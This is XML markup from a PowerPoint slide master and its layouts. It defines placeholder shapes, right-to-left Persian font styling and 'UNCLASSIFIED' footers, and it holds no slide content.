          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" defTabSz="914400">
              <a:defRPr sz="1400" baseline="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{413742FF-BDC1-48D9-831D-4AF6C117D9C2}"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smtClean="0"/>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fld id="{1033586D-53EB-4A37-A176-D43A4DF1619D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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76200"/>
            <a:ext cx="2076450" cy="5973763"/>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228600" y="76200"/>
            <a:ext cx="607695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smtClean="0"/>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fld id="{800820CA-E0AD-4B67-8DB3-76C777895592}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{3658DA7C-283B-4D25-BE3C-07A9347D624B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6245225"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>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0">
              <a:srgbClr val="FFCC66"/>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rtl="1">
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="1">
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r" rtl="1">
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r" rtl="1">
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r" rtl="1">
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r" rtl="1">
              <a:defRPr baseline="0">
                <a:latin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baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr baseline="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{372F859F-7736-4987-9091-D462CA9961F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rtl="1">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lgn="r" rtl="1">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lgn="r" rtl="1">
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{B709ACF1-A56A-40A6-A188-330734F2F372}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="1">
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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rtl="1">
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1524000"/>
            <a:ext cx="4038600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="1">
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r" rtl="1">
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r" rtl="1">
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r" rtl="1">
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r" rtl="1">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495800" y="1524000"/>
            <a:ext cx="4038600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="1">
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr algn="r" rtl="1">
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr algn="r" rtl="1">
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr algn="r" rtl="1">
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr algn="r" rtl="1">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lgn="r" rtl="1">
              <a:defRPr smtClean="0"/>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fld id="{86C268AF-9274-45A1-8C58-C6307DA98259}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr rtl="1">
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Number Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{75BB5FBF-5EFB-4815-AC33-57F418582FEF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Footer Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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0">
              <a:srgbClr val="FFCC66"/>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rtl="1">
              <a:defRPr/>
            </a:lvl1p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lgn="r" rtl="1">
              <a:defRPr smtClean="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{75BF0514-154F-437A-816C-6723C1E5BBF2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr rtl="1">
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{21D07803-AD03-4DAA-B2E6-9A2B92C8C0C4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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fld id="{BD39816F-0D25-44EE-AAD4-8C2A930AF735}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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fld id="{386B6176-EAE9-4C70-A78F-E5372D690227}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Footer Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6400800"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr smtClean="0">
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</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CC66"/>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76200"/>
            <a:ext cx="8229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04800" y="15240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609600" y="6661150"/>
            <a:ext cx="1828800" cy="1524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lgn="r" rtl="1">
              <a:defRPr sz="800" baseline="0" smtClean="0">
                <a:latin typeface="Arial Narrow" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1108" name="Rectangle 84"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="990600"/>
            <a:ext cx="9144000" cy="76200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fa-IR">
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Rectangle 89"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="6477000"/>
            <a:ext cx="457200" cy="381000"/>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lvl1pPr algn="ctr" rtl="1">
              <a:defRPr sz="1300">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{0F666054-DE94-4100-A21F-755E6EDB835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timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
          <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="342900" indent="-342900" algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="65000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="3600">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="742950" indent="-285750" algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="•"/>
        <a:defRPr sz="2800">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="–"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
